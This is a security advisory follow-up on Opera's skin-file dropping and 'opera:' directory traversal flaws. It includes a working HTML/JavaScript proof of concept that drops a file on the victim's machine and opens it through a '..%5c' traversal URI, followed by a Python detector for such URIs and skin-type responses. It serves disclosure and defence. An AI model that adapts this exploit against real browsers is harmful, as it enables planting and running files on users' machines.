
Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit)





Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit):
==================================================================================




ADDITIONAL DETAILS:


While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER" option is 
selected, the "opera7/profile" folder is stored under "<username>/application 
data/opera7" instead of in the Opera root folder. The "profile" folder holds the 
user-specific data of each Opera user, so every user has a separate "profile" 
folder in his own "<username>/application data/opera7" folder.

The folders of interest here, those into which configuration files (skin, 
toolbar, mouse, etc.) are automatically downloaded and stored, are subfolders of 
the "profile" folder and are therefore moved to this location as well.

In this scenario arbitrary files can still be dropped into the respective 
folders. To execute them, however, the <username> part of the path must be 
known. Other methods of exploiting this scenario may come up later.



SIMPLE PoC EXPLOIT:


This is a simple PoC for the two Opera vulnerabilities detailed in the "Opera 
Skinned : Arbitrary File Dropping And Execution" and "Opera Web Browser 
Directory Traversal in Internal URI Protocol" advisories.

"main.htm" is the file that is loaded into the browser remotely. It opens 
"skin.htm" in a new window. The Content-Type of "skin.htm" must be set to 
"application/x-opera-skin" on the server. When skin.htm is opened in this way, 
Opera drops it into the "<opera dir>/profile/skin/" folder on the victim's 
machine. This demonstrates the first vulnerability.

After skin.htm has been dropped, main.htm redirects to the local copy of 
skin.htm. The path to skin.htm is constructed using the directory traversal in 
the internal "opera:" protocol. This demonstrates the second vulnerability.


NOTE: Don't forget to set the Content-Type of skin.htm to 
"application/x-opera-skin".


---------------START MAIN.HTM----------------


<html>
<head>
<script language="javascript">

// The server should return the Content-Type "application/x-opera-skin" for
// "skin.htm". Opera then drops "skin.htm" into the "<opera dir>/profile/skin/"
// folder (first vulnerability).
var win = open("skin.htm");

// Give the download time to complete; modify the delay according to your situation.
setTimeout("redir()", 2000);

function redir() {
    // Uses the directory traversal flaw in the "opera:" internal protocol
    // (advisory 2) to reach the dropped file by path; in this case skin.htm.
    window.location.href = "opera:/help/..%5c/profile/skin/skin.htm";
}

</script>
</head>

<body>
<h1>This is the main file</h1>
</body>
</html>



---------------END MAIN.HTM----------------


---------------START SKIN.HTM----------------


<body>
<h1>Opera Skinned!!!</h1>
<p>This is skin.htm from "&lt;opera dir&gt;/profile/skin/" on localhost.</p>
</body>


---------------END SKIN.HTM----------------
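The PoC above relies on two things a proxy or log reviewer can look for: a response served with the "application/x-opera-skin" type, and an "opera:" URI whose path uses "..%5c" to step out of the "help" directory into "profile". The following Python is an added defender-side check, not part of the advisory or of Opera; the log-line format and the example.invalid host are constructed for illustration.

```python
from urllib.parse import unquote, urlsplit

INTERNAL_SCHEME = "opera"                  # browser-internal scheme from the advisory
SKIN_TYPE = "application/x-opera-skin"     # MIME type that makes Opera drop the file

def decode_fully(text: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %5c, %255c, ... all become '\\'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def analyse_internal_uri(uri: str) -> dict:
    """For an opera: URI, report whether it contains '..' segments and where the
    path resolves to relative to the scheme root. Other schemes return {}."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != INTERNAL_SCHEME:
        return {}
    # Decode first, then fold Windows separators so '..%5c' reads as '../'.
    path = decode_fully(parts.path).replace("\\", "/")
    segments = [s for s in path.split("/") if s not in ("", ".")]
    resolved = []
    for seg in segments:
        if seg == "..":
            if resolved:
                resolved.pop()
        else:
            resolved.append(seg)
    return {"traversal": ".." in segments,
            "top_level": segments[0] if segments else "",
            "resolves_to": "/".join(resolved)}

def flag_skin_responses(log_lines) -> list:
    """Return URLs from constructed proxy log lines ('<url> <content-type>') that
    were served with the skin MIME type, i.e. files Opera would write to disk."""
    hits = []
    for line in log_lines:
        url, _, ctype = line.partition(" ")
        if ctype.strip().lower().startswith(SKIN_TYPE):
            hits.append(url)
    return hits

# Constructed sample input: the PoC URI from the advisory plus a benign help URI.
if __name__ == "__main__":
    for u in ("opera:/help/..%5c/profile/skin/skin.htm", "opera:/help/index.html"):
        print(u, analyse_internal_uri(u))
    print(flag_skin_responses(["http://example.invalid/skin.htm application/x-opera-skin",
                               "http://example.invalid/main.htm text/html"]))
```

For the PoC URI the check reports a traversal that starts under "help" but resolves to "profile/skin/skin.htm", which is exactly the sibling directory the dropped skin lands in.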





--
S.G.Masood
sgmasood@xxxxxxxxx

Hyderabad,
India.



DISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the 
general public about a security issue. Use this information at your own 
discretion.

In brief, the author is not responsible for any use, misuse or abuse of this 
information. Also, this information is provided "as is" without warranty of 
any kind.